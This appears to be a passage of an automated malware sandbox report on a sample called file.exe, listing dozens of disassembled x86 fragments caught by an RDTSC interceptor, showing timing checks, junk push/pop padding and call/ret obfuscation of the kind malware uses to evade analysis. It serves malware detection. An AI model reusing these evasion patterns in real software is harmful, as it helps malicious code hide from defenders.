Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEF5D second address: CEEF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEF69 second address: CEEF6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEF6E second address: CEEF74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E285 second address: D0E289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E289 second address: D0E297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F1675279DA8h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E297 second address: D0E2A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F1674F90E16h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E2A4 second address: D0E2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1675279DA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F1675279DA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E2B9 second address: D0E2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E529 second address: D0E57C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F1675279DB8h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c je 00007F1675279DA6h 0x00000012 pushad 0x00000013 popad 0x00000014 jo 00007F1675279DA6h 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f pushad 0x00000020 pushad 0x00000021 je 00007F1675279DA6h 0x00000027 jmp 00007F1675279DB7h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E57C second address: D0E5A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F1674F90E1Eh 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007F1674F90E16h 0x00000013 pushad 0x00000014 jmp 00007F1674F90E20h 0x00000019 ja 00007F1674F90E16h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0EB57 second address: D0EB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DB0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0EB6B second address: D0EB71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0EE95 second address: D0EEA0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F1675279DA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0EEA0 second address: D0EEB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jmp 00007F1674F90E1Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0EFE3 second address: D0F01D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DACh 0x00000009 jmp 00007F1675279DB8h 0x0000000e jg 00007F1675279DA6h 0x00000014 popad 0x00000015 pushad 0x00000016 jl 00007F1675279DA6h 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F01D second address: D0F023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F023 second address: D0F043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1675279DB7h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F043 second address: D0F047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F2CA second address: D0F2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F413 second address: D0F41D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1674F90E16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F41D second address: D0F423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F423 second address: D0F42D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F42D second address: D0F431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0716C second address: D07172 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D07172 second address: D0717D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F1675279DA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0717D second address: D07188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D07188 second address: D0718E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F5AF second address: D0F5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F5B6 second address: D0F5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jg 00007F1675279DA6h 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1675279DAFh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F5D2 second address: D0F5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0FBAA second address: D0FBFB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1675279DCCh 0x00000008 jmp 00007F1675279DADh 0x0000000d jmp 00007F1675279DB9h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007F1675279DBFh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0FEC3 second address: D0FECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F1674F90E16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0FECE second address: D0FF04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F1675279DACh 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007F1675279DB7h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0FF04 second address: D0FF08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0FF08 second address: D0FF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1675279DAEh 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1008D second address: D10091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D10091 second address: D100A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F1675279DACh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D100A1 second address: D100A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D12DF1 second address: D12DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D156C5 second address: D156CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D156CF second address: D156D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1BEEC second address: D1BEF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1BEF2 second address: D1BEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1BEFB second address: D1BF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1674F90E1Eh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F1674F90E28h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1C35F second address: D1C380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F1675279DA6h 0x0000000d jmp 00007F1675279DB3h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1C380 second address: D1C385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1C385 second address: D1C3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1675279DA6h 0x0000000a jmp 00007F1675279DAFh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1D209 second address: D1D26E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1674F90E1Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 1D091A3Dh 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F1674F90E18h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov esi, dword ptr [ebp+122D394Eh] 0x00000034 pushad 0x00000035 mov ecx, 1F15945Bh 0x0000003a mov edi, dword ptr [ebp+122D365Ah] 0x00000040 popad 0x00000041 mov esi, dword ptr [ebp+122D37B2h] 0x00000047 push 30C13DCCh 0x0000004c push eax 0x0000004d push edx 0x0000004e jp 00007F1674F90E18h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1D5C7 second address: D1D5D1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1D8C7 second address: D1D8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1D8CC second address: D1D8D6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1675279DACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1DDC0 second address: D1DDCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F1674F90E16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1DE67 second address: D1DE6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1DE6D second address: D1DE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1DE71 second address: D1DE82 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1E107 second address: D1E116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F1674F90E1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1E285 second address: D1E28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1F930 second address: D1F934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1F934 second address: D1F949 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1F949 second address: D1F954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F1674F90E16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D209EC second address: D209F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D209F2 second address: D209F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D209F8 second address: D209FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D209FC second address: D20A80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F1674F90E18h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 cmc 0x00000027 push 00000000h 0x00000029 mov esi, dword ptr [ebp+122D1920h] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F1674F90E18h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b or dword ptr [ebp+122D17C0h], edi 0x00000051 xchg eax, ebx 0x00000052 pushad 0x00000053 jmp 00007F1674F90E26h 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D23037 second address: D2305A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F1675279DA6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D22DC1 second address: D22DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2503F second address: D25051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1675279DABh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D25051 second address: D25055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2A466 second address: D2A46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2B3EF second address: D2B3F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2A67F second address: D2A683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2A683 second address: D2A691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F1674F90E1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2B5F4 second address: D2B5F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2B5F8 second address: D2B60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F1674F90E18h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E431 second address: D2E435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E435 second address: D2E449 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jno 00007F1674F90E16h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2F5C8 second address: D2F5CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D312B0 second address: D312B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3245B second address: D3245F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3341E second address: D33422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D33422 second address: D3342C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3342C second address: D33432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D33432 second address: D33436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D33436 second address: D33451 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D33451 second address: D334BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jp 00007F1675279DA8h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 nop 0x00000011 cmc 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F1675279DA8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F1675279DA8h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a mov ebx, 22909EE6h 0x0000004f push eax 0x00000050 push edi 0x00000051 pushad 0x00000052 jnc 00007F1675279DA6h 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D314AD second address: D314B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D31557 second address: D3155E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D336AF second address: D336B9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1674F90E1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3557F second address: D35584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D376F6 second address: D3770C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1674F90E1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3770C second address: D37710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37710 second address: D37723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1674F90E1Bh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3794E second address: D37954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A851 second address: D3A855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38AB2 second address: D38AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A855 second address: D3A869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jbe 00007F1674F90E16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F1674F90E18h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D41D68 second address: D41D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
